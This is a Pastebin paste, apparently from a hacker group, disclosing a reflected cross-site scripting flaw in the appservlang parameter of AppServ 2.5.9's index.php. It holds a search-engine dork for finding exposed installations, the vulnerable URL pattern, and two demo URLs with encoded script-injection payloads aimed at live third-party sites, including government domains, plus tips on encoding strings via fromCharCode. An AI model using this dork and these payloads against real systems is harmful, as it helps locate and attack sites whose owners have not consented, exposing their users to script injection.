Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- AppServ 2.5.9 Cross Site Scripting
- HOMe : http://www.appservnetwork.com
- Author : sH@rk-Dz
- FB : ****/hasni.dzshark
- Date: 28/05/2014
- D0rk : intitle:"AppServ Open Project" -site:www.appservnetwork.com
- Vulnerable File : /index.php
- Exploit : http://localhost.com/index.php?appservlang=
- Demo1:http://testbank.moe.gov.eg/index.php?appservlang=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
- Demo2:http://www.fcea.gov.tw/index.php?appservlang=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2888,%20115,%20115,%2045,%2066,%20121,%2058,%2045,%20115,%2072,%2064,%20114,%20107,%2045,%2068,%20122%29%29;%3C/script%3E
- ====================================================================================
- Small Info About The Vuln:
- In The Name Of Allah ^_^
- The Vuln Found in the file ==> index.php
- index.php at the paramter ?appservlang=
- we can also inject any code of xss and send by GET in live http-Headers
- and also we can iject string not only number using Charcode (in hackbar ther's small addon)
- note:type of the vul is reflected :)
- Greet's To : All ALG & ARB E-Hackers || exploit4arab.net || S3k-k.com || Aljyyosh.com || V4-team.com || Welad Cha3b Dz:)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement